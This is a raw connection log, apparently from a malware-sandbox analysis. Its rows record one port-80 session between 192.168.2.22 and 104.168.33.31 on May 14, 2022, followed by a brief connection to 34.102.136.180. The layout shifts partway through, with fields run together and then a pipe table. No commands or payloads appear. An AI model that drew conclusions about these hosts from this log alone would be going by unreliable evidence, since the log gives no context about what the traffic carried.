May 14, 2022 15:19:31.873815060 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873836040 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873836994 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873852015 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873858929 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873868942 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873883009 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873900890 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873903036 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873918056 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873924971 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873934031 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873958111 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873965979 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.873986006 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.873999119 CEST  49173        80         192.168.2.22   104.168.33.31
May 14, 2022 15:19:31.874008894 CEST  80           49173      104.168.33.31  192.168.2.22
May 14, 2022 15:19:31.874015093 CEST  49173        80         192.168.2.22   104.168.33.31
                                                      May 14, 2022 15:19:31.874032021 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874047041 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874053955 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874068022 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874075890 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874085903 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874097109 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874116898 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874119043 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874135971 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874150038 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874152899 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874175072 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.874188900 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.874207973 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.880806923 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987591982 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987647057 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987684965 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987687111 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987716913 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987721920 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987725973 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987767935 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987799883 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987806082 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987813950 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987852097 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987853050 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987894058 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987894058 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987932920 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.987935066 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987976074 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.987978935 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988013983 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988014936 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988054037 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988054991 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988095045 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988095045 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988133907 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988136053 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988173008 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988173008 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988214016 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988241911 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988284111 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988286018 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988327980 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988331079 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988370895 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988372087 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988410950 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988410950 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988449097 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988451004 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988508940 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988518953 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988560915 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988562107 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988605976 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988619089 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988645077 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988646984 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988687992 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988708019 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988725901 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988753080 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988760948 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.988766909 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.988806009 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.991838932 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994167089 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994213104 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994254112 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994281054 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994296074 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994312048 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994317055 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994335890 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994339943 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994378090 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994380951 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994419098 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994422913 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994463921 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994463921 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994503975 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994503975 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994541883 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994544983 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994585037 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994589090 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994625092 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994628906 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994668961 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994672060 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994713068 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994713068 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994752884 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994756937 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994797945 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994798899 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994837046 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994837999 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994878054 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994879007 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994920969 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994920969 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.994961977 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:31.994961977 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.995003939 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:31.998342037 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102241993 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102273941 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102289915 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102307081 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102318048 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102323055 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102341890 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102345943 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102349997 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102359056 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102359056 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102374077 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102376938 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.102390051 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.102411032 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105182886 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105207920 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105225086 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105242014 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105246067 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105252981 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105269909 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105287075 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105300903 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105304003 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105307102 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105309963 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105313063 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105319977 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105324030 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105333090 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105341911 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105353117 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105365992 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105371952 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105392933 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105401993 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105410099 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105421066 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105426073 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105432987 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105443954 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105454922 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105460882 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105467081 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105479002 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105488062 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105495930 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105499029 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105513096 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105524063 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105530024 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.105535984 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.105557919 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.106884956 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111634016 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111661911 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111679077 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111695051 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111711979 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111726046 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111737967 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111749887 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111754894 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111802101 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111820936 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111821890 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111835003 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111843109 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111860991 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111869097 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111879110 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111881971 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111893892 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111897945 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111912966 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111916065 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111933947 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111938000 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111948013 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111953020 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111963034 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111970901 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111984015 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.111988068 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.111996889 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.112008095 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.112020016 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.112040043 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.113650084 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215792894 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.215852976 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.215889931 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.215898991 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215926886 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.215926886 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215936899 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215962887 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.215964079 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216000080 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216002941 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216038942 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216041088 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216073036 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216075897 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216109991 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216111898 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216150045 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216150999 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216183901 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216187000 CEST8049173104.168.33.31192.168.2.22
                                                      May 14, 2022 15:19:32.216221094 CEST4917380192.168.2.22104.168.33.31
                                                      May 14, 2022 15:19:32.216223955 CEST8049173104.168.33.31192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 14, 2022 15:19:32.216258049 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.216262102 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.216296911 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.216300011 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.216334105 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.216336012 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.216370106 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.216372967 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.216407061 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.218668938 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218710899 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218745947 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.218749046 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218770981 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.218785048 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218789101 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.218822002 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218823910 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.218859911 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218863964 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.218895912 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218900919 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.218931913 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218939066 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.218967915 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.218976974 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219006062 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219012022 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219042063 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219046116 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219086885 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219089985 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219125032 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219126940 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219163895 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219166040 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219202042 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219202995 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219238043 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219238997 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219273090 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219274998 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219310045 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219311953 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219346046 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219357967 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219381094 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219383001 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219419003 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219419956 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219455004 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219458103 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219491005 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219492912 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219527960 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219531059 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219564915 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219567060 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219602108 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219603062 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219638109 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219640970 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219676971 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219677925 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219711065 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219716072 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219752073 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219753027 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219789028 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219808102 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219845057 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219851971 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219890118 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219891071 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219918966 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:32.219926119 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.219959021 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:32.220094919 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:37.160038948 CEST | 80 | 49173 | 104.168.33.31 | 192.168.2.22
May 14, 2022 15:19:37.160197020 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:19:38.759443998 CEST | 49173 | 80 | 192.168.2.22 | 104.168.33.31
May 14, 2022 15:20:49.280080080 CEST | 49174 | 80 | 192.168.2.22 | 34.102.136.180
May 14, 2022 15:20:49.297899961 CEST | 80 | 49174 | 34.102.136.180 | 192.168.2.22
May 14, 2022 15:20:49.298039913 CEST | 49174 | 80 | 192.168.2.22 | 34.102.136.180
May 14, 2022 15:20:49.298163891 CEST | 49174 | 80 | 192.168.2.22 | 34.102.136.180
May 14, 2022 15:20:49.315794945 CEST | 80 | 49174 | 34.102.136.180 | 192.168.2.22
May 14, 2022 15:20:49.414908886 CEST | 80 | 49174 | 34.102.136.180 | 192.168.2.22
May 14, 2022 15:20:49.414938927 CEST | 80 | 49174 | 34.102.136.180 | 192.168.2.22
